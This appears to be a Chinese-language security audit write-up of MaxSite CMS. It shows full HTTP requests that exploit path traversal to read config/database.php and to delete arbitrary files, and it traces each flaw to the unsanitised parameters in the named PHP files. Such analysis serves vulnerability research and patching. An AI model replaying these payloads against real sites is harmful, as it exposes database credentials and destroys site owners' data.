MaxSite CMS是一款适用于网站、博客、企业网站、名片、落地页等的管理系统。该系统非常适合普通用户、自由职业者和网络工作室。MaxSite CMS具有丰富的功能和高速的运行速度。制作地点:乌克兰。
任意文件读取
构造数据包
POST /ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfZmlsZXMvbG9hZC1maWxlLWFqYXgucGhw HTTP/1.1
Host: maxsitecms.test
Content-Length: 45
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://maxsitecms.test
Referer: http://maxsitecms.test/admin/editor_files
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: admin-menu=%7B%220%22%3A1%2C%221%22%3A1%2C%222%22%3A1%7D; maxsitecms.test-admin-files1=%7B%220%22%3A0%7D; maxsitecms.test-admin-files-e1=%7B%220%22%3A1%7D; ci_session=a%3A19%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%223f85a588b8a9337f905e519cebe411c1%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A114%3A%22Mozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F85.0.4183.83%20Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1699602586%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A10%3A%22userlogged%22%3Bs%3A1%3A%221%22%3Bs%3A18%3A%22last_activity_prev%22%3Bi%3A1699602579%3Bs%3A7%3A%22comuser%22%3Bi%3A0%3Bs%3A8%3A%22users_id%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22users_nik%22%3Bs%3A5%3A%22admin%22%3Bs%3A11%3A%22users_login%22%3Bs%3A92%3A%22MSO-8uC7s6rPzCMxfnQASrFySO5MxZMkKIVD2syvk8tXIIP04PzGd0gveLS5tQoAOGap8r5kVmVB3Xttpm2j7rzgrQ%3D%3D%22%3Bs%3A14%3A%22users_password%22%3Bs%3A132%3A%22MSO-Tm8dd0dwpsR85Op2Jdgl%2B7xFK7Mru8hXfUW8NC%2BDQquZvi9snvaNcYbOX%2FlIl7Cr%2BBDAbPhjL7DovYaa2Mu2SFxdxzeq1uBvqiLbwzCe338pQ5rk1zOZSdzSnsrjyf5T%22%3Bs%3A15%3A%22users_groups_id%22%3Bs%3A1%3A%221%22%3Bs%3A16%3A%22users_last_visit%22%3Bs%3A19%3A%222023-11-10%2015%3A29%3A07%22%3Bs%3A17%3A%22users_show_smiles%22%3Bs%3A1%3A%221%22%3Bs%3A15%3A%22users_time_zone%22%3Bs%3A4%3A%227200%22%3Bs%3A14%3A%22users_language%22%3Bs%3A2%3A%22ru%22%3Bs%3A16%3A%22users_avatar_url%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22users_email%22%3Bs%3A8%3A%221%40qq.com%22%3B%7D7501282536167f97bfe43d1b7d27ac97b58c3260
Connection: close
file=Li4vLi4vLi4vY29uZmlnL2RhdGFiYXNlLnBocA==
可以读取到文件 ../../../config/database.php
路由和传参的值都进行了 base64 编码
application/maxsite/admin/plugins/editor_files/load-file-ajax.php
获取的参数 file 没有进行别的处理,拼接到 $file 中,最后通过 file_get_contents 读取到指定文件的内容
在前端可以通过此处,抓取到读取内容的数据包
任意文件删除
构造数据包
POST /ajax/YWRtaW4vcGx1Z2lucy9hZG1pbl9wYWdlL2FsbC1maWxlcy11cGRhdGUtYWpheC5waHA= HTTP/1.1
Host: maxsitecms.test
Content-Length: 48
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://maxsitecms.test
Referer: http://maxsitecms.test/admin/editor_files
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: admin-menu=%7B%220%22%3A1%2C%221%22%3A1%2C%222%22%3A1%7D; maxsitecms.test-admin-files1=%7B%220%22%3A0%7D; maxsitecms.test-admin-files-e1=%7B%220%22%3A1%7D; ci_session=a%3A19%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%223f85a588b8a9337f905e519cebe411c1%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A114%3A%22Mozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F85.0.4183.83%20Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1699602586%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A10%3A%22userlogged%22%3Bs%3A1%3A%221%22%3Bs%3A18%3A%22last_activity_prev%22%3Bi%3A1699602579%3Bs%3A7%3A%22comuser%22%3Bi%3A0%3Bs%3A8%3A%22users_id%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22users_nik%22%3Bs%3A5%3A%22admin%22%3Bs%3A11%3A%22users_login%22%3Bs%3A92%3A%22MSO-8uC7s6rPzCMxfnQASrFySO5MxZMkKIVD2syvk8tXIIP04PzGd0gveLS5tQoAOGap8r5kVmVB3Xttpm2j7rzgrQ%3D%3D%22%3Bs%3A14%3A%22users_password%22%3Bs%3A132%3A%22MSO-Tm8dd0dwpsR85Op2Jdgl%2B7xFK7Mru8hXfUW8NC%2BDQquZvi9snvaNcYbOX%2FlIl7Cr%2BBDAbPhjL7DovYaa2Mu2SFxdxzeq1uBvqiLbwzCe338pQ5rk1zOZSdzSnsrjyf5T%22%3Bs%3A15%3A%22users_groups_id%22%3Bs%3A1%3A%221%22%3Bs%3A16%3A%22users_last_visit%22%3Bs%3A19%3A%222023-11-10%2015%3A29%3A07%22%3Bs%3A17%3A%22users_show_smiles%22%3Bs%3A1%3A%221%22%3Bs%3A15%3A%22users_time_zone%22%3Bs%3A4%3A%227200%22%3Bs%3A14%3A%22users_language%22%3Bs%3A2%3A%22ru%22%3Bs%3A16%3A%22users_avatar_url%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22users_email%22%3Bs%3A8%3A%221%40qq.com%22%3B%7D7501282536167f97bfe43d1b7d27ac97b58c3260
Connection: close
dir=../../../../../../../../../&deletefile=1.txt
可以删除文件 ../../../../../../../../../1.txt
路由进行了 base64 编码
application/maxsite/admin/plugins/admin_page/all-files-update-ajax.php
获取到的参数 dir 和 deletefile 没有进行别的处理,拼接到 $file 中,最后通过 file_exists 判断文件存在后,调用 unlink 对文件进行删除
任意文件删除
构造数据包
POST /admin/files/e HTTP/1.1
Host: maxsitecms.test
Content-Length: 136
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://maxsitecms.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://maxsitecms.test/admin/files/e
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: maxsitecms.test-admin-files1=%7B%220%22%3A0%7D; maxsitecms.test-admin-files-e1=%7B%220%22%3A1%7D; admin-menu=%7B%220%22%3A1%2C%221%22%3A1%2C%222%22%3A1%2C%223%22%3A1%7D; mso-tabs_widget_000=0; ci_session=a%3A19%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%223f85a588b8a9337f905e519cebe411c1%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A114%3A%22Mozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F85.0.4183.83%20Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1699605734%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A10%3A%22userlogged%22%3Bs%3A1%3A%221%22%3Bs%3A18%3A%22last_activity_prev%22%3Bi%3A1699605718%3Bs%3A7%3A%22comuser%22%3Bi%3A0%3Bs%3A8%3A%22users_id%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22users_nik%22%3Bs%3A5%3A%22admin%22%3Bs%3A11%3A%22users_login%22%3Bs%3A92%3A%22MSO-8uC7s6rPzCMxfnQASrFySO5MxZMkKIVD2syvk8tXIIP04PzGd0gveLS5tQoAOGap8r5kVmVB3Xttpm2j7rzgrQ%3D%3D%22%3Bs%3A14%3A%22users_password%22%3Bs%3A132%3A%22MSO-Tm8dd0dwpsR85Op2Jdgl%2B7xFK7Mru8hXfUW8NC%2BDQquZvi9snvaNcYbOX%2FlIl7Cr%2BBDAbPhjL7DovYaa2Mu2SFxdxzeq1uBvqiLbwzCe338pQ5rk1zOZSdzSnsrjyf5T%22%3Bs%3A15%3A%22users_groups_id%22%3Bs%3A1%3A%221%22%3Bs%3A16%3A%22users_last_visit%22%3Bs%3A19%3A%222023-11-10%2015%3A29%3A07%22%3Bs%3A17%3A%22users_show_smiles%22%3Bs%3A1%3A%221%22%3Bs%3A15%3A%22users_time_zone%22%3Bs%3A4%3A%227200%22%3Bs%3A14%3A%22users_language%22%3Bs%3A2%3A%22ru%22%3Bs%3A16%3A%22users_avatar_url%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22users_email%22%3Bs%3A8%3A%221%40qq.com%22%3B%7D5e5de5418d8060eaf150a1e9166713e3736711b6
Connection: close
f_session_id=3f85a588b8a9337f905e519cebe411c1&f_check_files%5B%5D=../../../../../../../../../../../../../../../../1.txt&f_delete_submit=
可以删除文件 ../../../../../../../../../1.txt
application/maxsite/admin/plugins/admin_files/admin.php
对获取的参数 f_check_files 没有进行处理,提取到 $file 中 最后调用 unlink 删除文件
为什么有的路由是需要 base64 编码,有一些却不需要呢,我们可以查看代码的这一部分
application/views/ajax.php
文件的最后为 -ajax.php 时,才会经过这样的路由。
